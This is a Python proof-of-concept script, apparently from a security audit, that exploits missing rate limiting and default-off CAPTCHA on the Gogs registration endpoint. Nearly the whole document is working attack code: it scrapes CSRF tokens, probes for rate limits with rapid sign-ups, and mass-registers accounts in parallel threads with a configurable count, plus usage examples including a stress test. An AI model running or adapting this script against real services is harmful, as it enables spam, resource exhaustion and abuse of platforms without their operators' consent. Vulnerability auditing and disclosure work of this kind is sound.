The registration endpoint does not implement IP-level rate limiting, and CAPTCHA is disabled by default. Attackers can automate the creation of a large number of accounts to abuse resources.
#!/usr/bin/env python3
"""
CHAIN-004 (Step 1+2): Batch Account Registration PoC
=====================================================
VERIFIED: 2026-03-11
Vulnerabilities Exploited:
- VULN-003: No rate limiting on registration endpoint
- VULN-012: CAPTCHA disabled by default
Severity: High
CVSS 3.1: 7.5 - AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Attack Description:
Gogs registration endpoint has no rate limiting and CAPTCHA is disabled
by default. This allows attackers to automatically create unlimited
accounts at high speed.
Impact:
- Mass account creation for spam/abuse
- Resource exhaustion (disk, database)
- Platform for distributed attacks
- Reputation damage to the Gogs instance
- Potential use in credential stuffing attacks
Prerequisites:
- Target allows public registration (DISABLE_REGISTRATION = false)
- CAPTCHA not enabled (ENABLE_REGISTRATION_CAPTCHA = false, default)
Author: Security Audit Team
Date: 2026-03-11
"""
import requests
import sys
import re
import json
import argparse
import time
import random
import string
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor, as_completed
from threading import Lock
class BatchRegistrationExploit:
"""Batch account registration exploit."""
def __init__(self, base_url: str, verbose: bool = True):
self.base_url = base_url.rstrip('/')
self.verbose = verbose
self.lock = Lock()
self.created_accounts = []
self.failed_attempts = 0
self.total_attempts = 0
def log(self, message: str, level: str = "INFO"):
if self.verbose:
timestamp = datetime.now().strftime("%H:%M:%S.%f")[:-3]
symbols = {"INFO": "[*]", "SUCCESS": "[+]", "FAIL": "[-]", "ERROR": "[!]", "WARN": "[~]", "STAT": "[#]"}
print(f"{timestamp} {symbols.get(level, '[*]')} {message}")
def extract_csrf(self, html: str) -> str:
match = re.search(r'name="_csrf"\s*value="([^"]+)"', html)
return match.group(1) if match else ""
def generate_random_string(self, length: int = 8) -> str:
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
def check_registration_enabled(self) -> dict:
"""Check if registration is enabled and CAPTCHA status."""
result = {"registration_enabled": False, "captcha_enabled": False}
try:
resp = requests.get(f"{self.base_url}/user/sign_up", timeout=10)
if resp.status_code == 200 and "sign_up" in resp.url:
result["registration_enabled"] = True
# Check for CAPTCHA
if "captcha" in resp.text.lower() or "recaptcha" in resp.text.lower():
result["captcha_enabled"] = True
except Exception:
pass
return result
def register_account(self, username: str, email: str, password: str) -> dict:
"""Register a single account."""
result = {
"success": False,
"username": username,
"email": email,
"error": None
}
try:
session = requests.Session()
# Get registration page and CSRF
resp = session.get(f"{self.base_url}/user/sign_up", timeout=10)
csrf = self.extract_csrf(resp.text)
if not csrf:
result["error"] = "No CSRF token"
return result
# Submit registration
resp = session.post(
f"{self.base_url}/user/sign_up",
data={
"_csrf": csrf,
"user_name": username,
"email": email,
"password": password,
"retype": password
},
allow_redirects=False,
timeout=10
)
# Check success (302 redirect to login)
if resp.status_code == 302:
result["success"] = True
elif "already" in resp.text.lower() or "taken" in resp.text.lower():
result["error"] = "Username/email already exists"
else:
result["error"] = f"HTTP {resp.status_code}"
except Exception as e:
result["error"] = str(e)
return result
def register_worker(self, index: int, prefix: str, password: str) -> dict:
"""Worker function for parallel registration."""
username = f"{prefix}_{index}_{self.generate_random_string(4)}"
email = f"{username}@batch-test.local"
result = self.register_account(username, email, password)
with self.lock:
self.total_attempts += 1
if result["success"]:
self.created_accounts.append({
"username": username,
"email": email,
"password": password
})
else:
self.failed_attempts += 1
return result
def test_rate_limiting(self, count: int = 20) -> dict:
"""Test if rate limiting exists on registration endpoint."""
self.log(f"Testing rate limiting with {count} rapid requests...", "INFO")
results = {
"requests_sent": 0,
"successful": 0,
"blocked": 0,
"rate_limited": False,
"requests_per_second": 0
}
prefix = f"ratetest_{int(time.time())}"
password = "RateTest123!"
start_time = time.time()
for i in range(count):
result = self.register_account(
f"{prefix}_{i}",
f"{prefix}_{i}@test.local",
password
)
results["requests_sent"] += 1
if result["success"]:
results["successful"] += 1
self.created_accounts.append({
"username": f"{prefix}_{i}",
"email": f"{prefix}_{i}@test.local",
"password": password
})
elif "rate" in str(result.get("error", "")).lower() or "too many" in str(result.get("error", "")).lower():
results["blocked"] += 1
results["rate_limited"] = True
break
elapsed = time.time() - start_time
results["requests_per_second"] = round(results["requests_sent"] / elapsed, 2) if elapsed > 0 else 0
results["elapsed_seconds"] = round(elapsed, 2)
return results
def batch_register(self, count: int, threads: int = 5, prefix: str = None) -> dict:
"""Register multiple accounts in parallel."""
if not prefix:
prefix = f"batch_{int(time.time())}"
password = "BatchTest123!"
self.log(f"Starting batch registration: {count} accounts with {threads} threads", "INFO")
self.created_accounts = []
self.failed_attempts = 0
self.total_attempts = 0
start_time = time.time()
with ThreadPoolExecutor(max_workers=threads) as executor:
futures = [
executor.submit(self.register_worker, i, prefix, password)
for i in range(count)
]
for future in as_completed(futures):
pass # Results handled in worker
elapsed = time.time() - start_time
return {
"requested": count,
"created": len(self.created_accounts),
"failed": self.failed_attempts,
"elapsed_seconds": round(elapsed, 2),
"accounts_per_second": round(len(self.created_accounts) / elapsed, 2) if elapsed > 0 else 0,
"accounts": self.created_accounts
}
def run_exploit(self, batch_count: int = 10, threads: int = 5) -> dict:
"""Run full batch registration exploit."""
result = {
"vulnerable": False,
"target": self.base_url,
"chain_id": "CHAIN-004",
"chain_name": "Batch Account Registration (Step 1+2)",
"vulnerabilities": ["VULN-003", "VULN-012"],
"severity": "High",
"evidence": {},
"created_accounts": [],
"error": None
}
print("\n" + "=" * 65)
print("CHAIN-004 (Step 1+2): Batch Account Registration")
print("=" * 65)
print(f"Target: {self.base_url}")
print(f"Batch Count: {batch_count}")
print(f"Threads: {threads}")
print("=" * 65 + "\n")
# Step 1: Check prerequisites
self.log("Step 1: Checking prerequisites...", "INFO")
prereq = self.check_registration_enabled()
result["evidence"]["prerequisites"] = prereq
if not prereq["registration_enabled"]:
self.log("Registration is disabled", "ERROR")
result["error"] = "Registration disabled"
return result
self.log("Registration is enabled", "SUCCESS")
if prereq["captcha_enabled"]:
self.log("CAPTCHA is enabled - batch registration may be blocked", "WARN")
else:
self.log("CAPTCHA is disabled (VULN-012 confirmed)", "SUCCESS")
result["vulnerable"] = True
# Step 2: Test rate limiting
print("\n[Step 2: Rate Limiting Test]")
print("-" * 40)
rate_test = self.test_rate_limiting(20)
result["evidence"]["rate_limiting_test"] = rate_test
if rate_test["rate_limited"]:
self.log(f"Rate limiting detected after {rate_test['requests_sent']} requests", "WARN")
else:
self.log(f"No rate limiting detected (VULN-003 confirmed)", "SUCCESS")
self.log(f" → {rate_test['successful']}/{rate_test['requests_sent']} accounts created", "INFO")
self.log(f" → Rate: {rate_test['requests_per_second']} req/sec", "INFO")
result["vulnerable"] = True
# Step 3: Batch registration
print(f"\n[Step 3: Batch Registration ({batch_count} accounts)]")
print("-" * 40)
batch_result = self.batch_register(batch_count, threads)
result["evidence"]["batch_registration"] = {
"requested": batch_result["requested"],
"created": batch_result["created"],
"failed": batch_result["failed"],
"elapsed_seconds": batch_result["elapsed_seconds"],
"accounts_per_second": batch_result["accounts_per_second"]
}
result["created_accounts"] = batch_result["accounts"]
self.log(f"Batch registration complete:", "INFO")
self.log(f" → Requested: {batch_result['requested']}", "INFO")
self.log(f" → Created: {batch_result['created']}", "SUCCESS")
self.log(f" → Failed: {batch_result['failed']}", "INFO")
self.log(f" → Time: {batch_result['elapsed_seconds']}s", "INFO")
self.log(f" → Rate: {batch_result['accounts_per_second']} accounts/sec", "INFO")
if batch_result["created"] > 0:
result["vulnerable"] = True
# Show created accounts
if batch_result["accounts"]:
print(f"\n[Created Accounts]")
print("-" * 40)
for acc in batch_result["accounts"][:10]:
self.log(f" {acc['username']} / {acc['email']}", "SUCCESS")
if len(batch_result["accounts"]) > 10:
self.log(f" ... and {len(batch_result['accounts']) - 10} more", "INFO")
# Summary
print("\n" + "=" * 65)
if result["vulnerable"]:
print("VULNERABILITY CONFIRMED!")
print("=" * 65)
self.log("Batch registration successful without rate limiting", "SUCCESS")
self.log(f"Total accounts created: {len(result['created_accounts'])}", "INFO")
self.log("Attack impact: Mass account creation for abuse", "WARN")
else:
print("NOT VULNERABLE")
print("=" * 65)
return result
def main():
parser = argparse.ArgumentParser(
description="CHAIN-004 (Step 1+2): Batch Account Registration PoC",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Example:
# Create 10 accounts with 5 threads
python3 poc_CHAIN_004_batch_register.py http://localhost:3000 -c 10 -t 5
# Stress test with 50 accounts
python3 poc_CHAIN_004_batch_register.py http://localhost:3000 -c 50 -t 10
Vulnerabilities Tested:
VULN-003: No rate limiting on registration
VULN-012: CAPTCHA disabled by default
"""
)
parser.add_argument('target_url', help='Target Gogs URL')
parser.add_argument('-c', '--count', type=int, default=10, help='Number of accounts to create (default: 10)')
parser.add_argument('-t', '--threads', type=int, default=5, help='Number of threads (default: 5)')
parser.add_argument('-q', '--quiet', action='store_true', help='Quiet mode')
args = parser.parse_args()
exploit = BatchRegistrationExploit(args.target_url, verbose=not args.quiet)
result = exploit.run_exploit(args.count, args.threads)
print("\n" + "=" * 65)
print("RESULT SUMMARY")
print("=" * 65)
# Print summary without full account list
summary = {k: v for k, v in result.items() if k != "created_accounts"}
summary["accounts_created_count"] = len(result["created_accounts"])
print(json.dumps(summary, indent=2, ensure_ascii=False))
sys.exit(0 if result["vulnerable"] else 1)
if __name__ == "__main__":
main()